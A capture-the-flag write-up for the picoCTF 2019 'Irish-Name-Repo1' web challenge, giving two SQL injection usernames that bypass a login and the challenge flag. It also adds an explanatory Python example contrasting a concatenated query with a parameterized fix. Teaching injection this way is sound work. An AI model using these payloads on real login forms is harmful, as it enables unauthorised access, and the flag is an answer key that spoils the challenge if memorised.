Irish-Name-Repo1

Points: 300

Category

Web Exploitation

Question

There is a website running at https://2019shell1.picoctf.com/problem/37868/ (link) or http://2019shell1.picoctf.com:37868. Do you think you can log us in? Try to see if you can login!

Hint

There doesn't seem to be many ways to interact with this, I wonder if the users are kept in a database?

Try to think about how does the website verify your login?

Solution

The login form is vulnerable to SQL injection.

Username:       ' OR 'A' = 'A' -- 
or another one: ' OR 1 --

Then click the Login button to see the flag.
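
Why those usernames work, and the fix, as an added example that is not the challenge's own code: the server-side query is not shown on this page, so the SQLite `users` table, its columns, the sample rows and the function names `make_db`, `login_vulnerable` and `login_parameterized` are all assumptions made for illustration.

```python
import sqlite3

def make_db():
    """Constructed sample database; the challenge's real schema is not shown."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    # Constructed rows. Plaintext passwords keep the sample short;
    # a real application stores salted password hashes.
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("admin", "s3cret-constructed"), ("alice", "hunter2-constructed")],
    )
    return conn

def login_vulnerable(conn, username, password):
    # Input is pasted into the SQL text, so a quote in `username` closes the
    # string literal and the rest of the input is parsed as SQL. The trailing
    # `--` comments out the password check.
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return sql, conn.execute(sql).fetchone() is not None

def login_parameterized(conn, username, password):
    # Placeholders pass the values separately from the SQL text, so the
    # input is only ever compared as data, never parsed as SQL.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None

# The two usernames given in the solution above.
PAYLOADS = ["' OR 'A' = 'A' -- ", "' OR 1 --"]

if __name__ == "__main__":
    conn = make_db()
    for payload in PAYLOADS:
        sql, ok = login_vulnerable(conn, payload, "")
        print("query sent :", sql)
        print("vulnerable :", "logged in" if ok else "rejected")
        ok = login_parameterized(conn, payload, "")
        print("parameterized:", "logged in" if ok else "rejected")
```

Printing the query text shows the WHERE clause collapsing to an always-true condition in the concatenated version, while the parameterized version rejects the same input.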

Flag

picoCTF{s0m3_SQL_a57b0b1d}
